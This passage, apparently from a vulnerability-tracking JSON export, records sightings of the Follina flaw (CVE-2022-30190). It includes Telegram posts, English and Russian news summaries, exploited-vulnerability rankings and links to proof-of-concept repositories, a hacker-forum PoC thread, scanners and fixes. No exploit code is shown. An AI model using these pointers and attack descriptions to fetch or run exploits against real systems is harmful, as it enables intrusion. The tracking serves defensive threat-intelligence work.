"https://github.com/JMousqueton/PoC-CVE-2022-30190", "creation_timestamp": "2022-06-01T20:49:44.000000Z"}, {"uuid": "87dfe89e-f093-4691-8b96-26eb71786619", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dragonforceio/739", "content": "P0c Patch / Fix 0day CVE-2022-30190 follina\n\nBy : impossible1337\nhttps://dragonforce.io/threads/0day-cve-2022-30190-follina-p0c-and-fix.13144/ \nForum Rasmi: https://dragonforce.io\nRadio Rasmi: https://radio.dragonforce.io\nFacebook: https://fb.me/dragonforcedotio\nTelegram: https://t.me/dragonforceio\nTwitter: https://twitter.com/dragonforceio\nYoutube: https://www.youtube.com/channel/UC9GycRXuy7-WMULPBkBp4Bw", "creation_timestamp": "2022-06-03T03:00:12.000000Z"}, {"uuid": "258f83bb-1699-47d7-9506-6e6484a52698", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": 
"https://t.me/dragonforceio/740", "content": "https://dragonforce.io/threads/0day-cve-2022-30190-follina-p0c-and-fix.13144/", "creation_timestamp": "2022-06-03T03:01:35.000000Z"}, {"uuid": "4299621d-9db9-4d4b-9bda-24b584db7c5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/6326", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (June 1-30)\n\nCVE-2022-30190 - Follina exploit\nCVE-2022-26134 - OGNL injection in Atlassian Confluence Server/Data Center\nCVE-2022-26809 - Weakness in a core Windows 7/10/Srv19/22 component (RPC)\nCVE-2022-30075 - TP-Link AX50 Auth RCE\nCVE-2022-23222 - Linux Kernel eBPF LPE\nCVE-2022-32275 - Grafana 8.4.3 allows reading files\nCVE-2022-26937 - Windows NFS NLM Portmap Stack Buffer Overflow\nCVE-2022-23088 - Heap Overflow in FreeBSD Wi-Fi Stack\nCVE-2022-31626 - RCE in PHP <=7.4.29\nCVE-2022-30333 - Dir Traversal in rar", "creation_timestamp": "2024-10-12T06:49:41.000000Z"}, {"uuid": "2ecfd10c-7629-494e-9271-8b2bb2e9dac5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/DCCFDjEFPe2QLNEHc05lpgLck17TBTfpWb2O-MdC7HDPV7nK", "content": "", "creation_timestamp": "2024-02-07T16:12:29.000000Z"}, {"uuid": "ac38b779-fea3-4e0b-be04-830a68121412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/mvPWI4un1-iOOZzGwGGDI0e0CA6ey2wKq3zB3-h9s87VgtZ8", "content": "", "creation_timestamp": "2024-02-07T16:16:30.000000Z"}, {"uuid": "4fe8b63e-8222-4521-b938-62e223ebde79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", 
"vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/7jzKcU8HVGZTkZZWwuUB25CufDvypfib6CwwM-UlhM1Jf1Mq", "content": "", "creation_timestamp": "2024-02-07T16:16:55.000000Z"}, {"uuid": "04e7299b-b9d8-4bfa-b1a4-4541328fcd60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/6105", "content": "#Threat_Research\nNew Microsoft Office Attack Vector via \"ms-msdt\" Protocol Scheme (CVE-2022-30190)\nhttps://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme/28694\n]-> https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug\n]-> https://github.com/bytecaps/CVE-2022-30190", "creation_timestamp": "2022-06-01T02:13:30.000000Z"}, {"uuid": "c6a27db5-b108-4e76-a04c-b1674f5d7b10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/6184", "content": "#Whitepaper\n\"TA570 Qakbot (Qbot) tries CVE-2022-30190 (Follina) exploit\", 09.06.2022.", "creation_timestamp": "2022-06-12T13:31:01.000000Z"}, {"uuid": "507d1b06-35bf-4394-abd4-cd97ebc18495", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/6514", "content": "#Threat_Research\n1. LofyLife: malicious npm packages steal Discord tokens and bank card data\nhttps://securelist.com/lofylife-malicious-npm-packages/107014\n2. 
Follina exploit (CVE-2022-30190) fuels \"live-off-the-land\" attacks\nhttps://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks", "creation_timestamp": "2022-08-02T11:49:18.000000Z"}, {"uuid": "43a4ea76-9dba-494a-ab7c-1ead3595d236", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/7395", "content": "#Analytics\nTop 10 most exploited vulnerabilities in 2022\n\n1. CVE-2022-30190: MS Office \"Follina\"\n2. CVE-2021-44228: Apache Log4Shell\n3. CVE-2022-22965: Spring4Shell\n4. CVE-2022-1388: F5 BIG-IP\n5. CVE-2022-0609: Google Chrome 0-day\n6. CVE-2017-11882: MS Office RCE\n7. CVE-2022-41082, CVE-2022-41040: ProxyNotShell\n8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs\n9. CVE-2022-26134: Atlassian Confluence RCE\n10. CVE-2022-30525: Zyxel RCE vulnerability", "creation_timestamp": "2024-10-11T03:03:25.000000Z"}, {"uuid": "0002c1b2-11a5-43e9-9e53-5484fb4b9efb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/6212", "content": "#Blue_Team_Techniques\nThese are two Python scripts compiled to quickly apply temporary protection against the CVE-2022-30190 vulnerability (Follina)\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix\n]-> Source Codes:\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code", "creation_timestamp": "2022-06-16T10:59:01.000000Z"}, {"uuid": "c2a7aa9d-97c7-48ff-b81a-d5d2d3366971", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": 
"https://t.me/CyberSecurityTechnologies/6797", "content": "#tools\n#Blue_Team_Techniques\n1. FollinaScanner - A tool that scans files &amp; directories for the Follina exploit (CVE-2022-30190)\nhttps://github.com/ErrorNoInternet/FollinaScanner\n2. On Challenges in Verifying Trusted Executable Files in Memory Forensics (+ .pdf)\nhttps://www.sciencedirect.com/science/article/pii/S2666281720300123?via%3Dihub\n]-&gt; Microsoft Authenticode:\nhttps://reversea.me/index.php/authenticode-i-understanding-windows-authenticode", "creation_timestamp": "2022-09-14T11:01:01.000000Z"}, {"uuid": "1177c63b-f347-4d0c-974d-20aa2221727b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/binary_xor/567", "content": "#news \u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 Microsoft Office \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0432\u043a\u043b\u044e\u0447\u0451\u043d\u043d\u044b\u0445 \u043c\u0430\u043a\u0440\u043e\u0441\u043e\u0432 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430.\n\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u0430\u044f Follina, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0434\u0442\u044f\u043d\u0443\u0442\u044c \u0437\u043b\u043e\u0432\u0440\u0435\u0434 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c Powershell-\u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e MSDT \u043f\u0440\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0438 \u0444\u0430\u0439\u043b\u0430. 
\u0414\u043b\u044f \u044d\u0442\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u043d\u0435 \u043d\u0443\u0436\u043d\u044b \u043d\u0438 \u043c\u0430\u043a\u0440\u043e\u0441\u044b, \u043d\u0438 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438. \u041d\u0435\u0442 \u0442\u043e\u043b\u043a\u0443 \u0438 \u043e\u0442 Windows Defender\u2019a. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, RTF-\u0444\u0430\u0439\u043b \u0434\u0430\u0436\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043d\u0435 \u043d\u0430\u0434\u043e: \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u0432\u044b\u0431\u0440\u0430\u0442\u044c \u0435\u0433\u043e, \u0435\u0441\u043b\u0438 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u043f\u0430\u043d\u0435\u043b\u044c \u043f\u0440\u0435\u0432\u044c\u044e. \u041f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u043e\u0439 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 MS, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 2013.\n\n\u0421\u0430\u043c\u043e\u0435 \u0437\u0430\u043d\u044f\u0442\u043d\u043e\u0435, \u041c\u0435\u043b\u043a\u043e\u0441\u043e\u0444\u0442\u0443 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u0435\u0449\u0451 \u0432 \u0430\u043f\u0440\u0435\u043b\u0435, \u043d\u043e \u0442\u0438\u043a\u0435\u0442 \u0437\u0430\u043a\u0440\u044b\u043b\u0438, \u0442\u0430\u043a \u043a\u0430\u043a \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0432\u043e\u0441\u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0441\u0442\u0438 \u0435\u0451 \u043d\u0435 \u0441\u043c\u043e\u0433\u043b\u0430. 
\u041d\u0443, \u0437\u0430\u0442\u043e \u0442\u0435\u043f\u0435\u0440\u044c \u0441\u043c\u043e\u0433\u0443\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438. \u0417\u0430\u043f\u043e\u0437\u0434\u0430\u043b\u044b\u0439 \u043f\u0430\u0442\u0447 \u0443\u0436\u0435 \u043e\u0431\u0435\u0449\u0430\u043d, \u0430 \u043f\u043e\u043a\u0430 \u0432\u043e\u0440\u0434\u043e\u0432\u0441\u043a\u0438\u0435 \u0444\u0430\u0439\u043b\u044b \u0432 \u043f\u043e\u0447\u0442\u0435 \u0434\u0430\u0436\u0435 \u043a\u0443\u0440\u0441\u043e\u0440\u043e\u043c \u0433\u043b\u0430\u0434\u0438\u0442\u044c \u043d\u0435 \u0441\u0442\u043e\u0438\u0442.\n\n@tomhunter", "creation_timestamp": "2023-02-08T23:37:32.000000Z"}, {"uuid": "6c49f5db-3505-42b2-a201-71cd75c63127", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/LearnExploit/4351", "content": "1. Follina (CVE-2022-30190)\n\n2. Log4Shell (CVE-2021-44228)\n\n3. Spring4Shell (CVE-2022-22965)\n\n4. F5 BIG-IP (CVE-2022-1388)\n\n5. Google Chrome zero-day (CVE-2022-0609)\n\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)\n\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)\n\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)\n\n9. Atlassian Confluence RCE flaw (CVE-2022-26134)\n\n10. 
Zyxel RCE vulnerability (CVE-2022-30525)\n\n#Exploit \n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-01-04T10:02:38.000000Z"}, {"uuid": "cdcd5fa3-2484-4e25-8e84-0385e7a509c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/onfpowernemesis/3211", "content": "\u041d\u0435\u043c\u0435Z\u0438\u0434\u0430 (Telegram)\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043d\u043e\u0432\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb (Windows Search) \u2014 CVE-2022-30190. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u043e\u043a\u043d\u0430, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0435 \u0445\u0440\u0430\u043d\u044f\u0449\u0438\u0435\u0441\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c. 
\u0410 \u0447\u0442\u043e\u0431\u044b \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u0442\u0430\u043a\u043e\u0435 \u043e\u043a\u043d\u043e, \u0436\u0435\u0440\u0442\u0432\u0435 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Word.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 Microsoft \u2014 MSDT, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u043e\u0439 \u0443\u0433\u0440\u043e\u0437\u044b. \u041d\u043e \u0435\u0441\u043b\u0438 \u043f\u043e\u0434\u0441\u0443\u043d\u0443\u0442\u044c \u0435\u043c\u0443 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office, \u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0441\u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 URI-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u00absearch-ms\u00bb, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c \u0438 HTML-\u0441\u0441\u044b\u043b\u043a\u0430\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043d\u0430\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u043d\u0430 
\u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435. \u0422\u0430\u043a\u0438\u0435 \u043f\u043e\u0438\u0441\u043a\u043e\u0432\u044b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043c\u043e\u0433\u0443\u0442 \u043e\u0431\u0440\u0430\u0449\u0430\u0442\u044c\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u043d\u043e \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u0435\u0442 \u0438\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438. \u041e\u043d \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u0449\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b, \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0435 \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445.\n\n\u041a\u0430\u043a \u044d\u0442\u043e \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c?\n\n\u0425\u0430\u043a\u0435\u0440 \u0441\u043e\u0437\u0434\u0430\u0451\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office \u0438 \u043a\u0430\u043a-\u0442\u043e \u0435\u0433\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u2014 \u0447\u0435\u0440\u0435\u0437 \u0441\u0430\u0439\u0442\u044b,...\n\n\u041f\u0435\u0440\u0435\u0439\u0442\u0438 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u043f\u043e\u0441\u0442", "creation_timestamp": "2025-01-14T13:35:58.000000Z"}, {"uuid": "d5fb0037-5a4c-426c-8388-94941dd62bba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": 
"https://gist.github.com/choco-bot/401a026b524772fda41c0ecb57d92a4c", "content": "", "creation_timestamp": "2026-05-04T17:03:16.000000Z"}]}